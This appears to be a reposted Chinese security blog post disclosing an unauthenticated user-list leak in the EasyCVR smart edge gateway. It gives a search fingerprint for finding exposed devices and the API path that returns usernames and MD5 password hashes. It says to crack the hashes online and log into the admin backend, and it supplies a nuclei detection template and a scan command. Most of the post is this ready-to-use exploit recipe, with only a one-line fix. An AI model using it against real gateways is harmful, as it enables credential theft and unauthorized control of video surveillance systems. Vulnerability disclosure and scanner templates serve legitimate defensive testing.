免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
EasyCVR智能边缘网关 userlist 信息泄漏漏洞
02
—
漏洞影响
全版本
03
—
漏洞描述
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
04
—
title="EasyCVR"05
—
漏洞复现
poc如下
/api/v1/userlist?pageindex=0&pagesize=10直接使用浏览器访问该接口即可看到敏感信息
Username字段为用户名,
Password字段为密码的MD5值,在线解密即可直接登陆后台
06
—
nuclei poc
id: easycvr-userlist-disclosureinfo:name: EasyCVR智能边缘网关userlist信息泄漏漏洞author: fgzseverity: highreference:nonemetadata:: title="EasyCVR"veified: truetags: EasyCVRhttp:method: GETpath:"{{BaseURL}}/api/v1/userlist?pageindex=0&pagesize=10": andmatchers:type: statusstatus:200type: wordpart: bodywords:'ID''Username''Password'condition: and
公众号复制代码可能格式有问题,nuclei poc 已上传网盘,后台回复0007免费获取
单个目标扫描
.nuclei.exe -t .easycvr-userlist-disclosure.yaml -u http://x.x.x.x:18000/ -me ttt
07
—
修复建议
限制该接口访问权限
08
—
关注我们
原文始发于微信公众号(AI与网安):【1day】EasyCVR智能边缘网关用户信息泄漏漏洞(附POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论